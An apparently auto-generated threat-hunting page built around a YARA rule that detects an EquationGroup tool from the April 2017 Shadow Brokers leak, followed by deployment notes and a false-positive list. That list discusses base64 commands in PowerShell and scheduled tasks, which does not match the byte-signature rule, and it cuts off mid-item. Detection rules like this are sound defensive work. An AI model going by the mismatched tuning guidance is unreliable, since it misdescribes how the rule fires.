Detects EquationGroup Tool - April Leak

Hunt Hypothesis

The hypothesis is that the detection of EquationGroup Tool - April Leak indicates potential adversary activity leveraging advanced persistent threats that may have established a foothold in the network. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate early-stage compromise from sophisticated adversaries.

YARA Rule

rule EquationGroup_Toolset_Apr17_DiBa_Target {
   meta:
      description = "Detects EquationGroup Tool - April Leak"
      author = "Florian Roth"
      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
      date = "2017-04-15"
      hash1 = "ffff3526ed0d550108e97284523566392af8523bbddb5f212df12ef61eaad3e6"
   strings:
      $op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
      $op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
      $op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
   condition:
      ( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 3 string patterns in its detection logic.

References

• https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
• Source Rule

False Positive Guidance

• Scenario: Scheduled System Maintenance Task
  Description: A legitimate scheduled task using schtasks.exe or Task Scheduler is running a maintenance script that includes base64 encoded commands or similar patterns.
  Filter/Exclusion: Check for ProcessName containing schtasks.exe or Task Scheduler, and verify if the command line includes known maintenance scripts or paths like C:\Windows\System32\sched.exe.

• Scenario: Admin Using PowerShell for Script Execution
  Description: An administrator is using PowerShell (powershell.exe) to run a script that contains base64 encoded data as part of a legitimate automation or configuration task.
  Filter/Exclusion: Filter by ProcessName containing powershell.exe and check for known admin scripts or paths like C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.

• Scenario: Logon Script Execution
  Description: A logon script executed via Group Policy or local user profile is using base64 encoded commands for user-specific configuration or deployment.
  Filter/Exclusion: Filter by ProcessName containing cmd.exe or gpresult.exe, and check for script paths like C:\Windows\System32\cmd.exe or C:\Windows\System32\gpresult.exe.

• Scenario: Data Encoding in Application Logs
  Description: A legitimate application (e.g., logparser.exe, eventvwr.exe, or wbemtest.exe) is encoding data in base64 for logging or debugging purposes.
  Filter/Exclusion: Filter by ProcessName containing logparser.exe, eventvwr.exe, or wbemtest.exe, and verify if the command line includes known logging or debugging tools.

• Scenario: Network Monitoring Tool with Base64 Output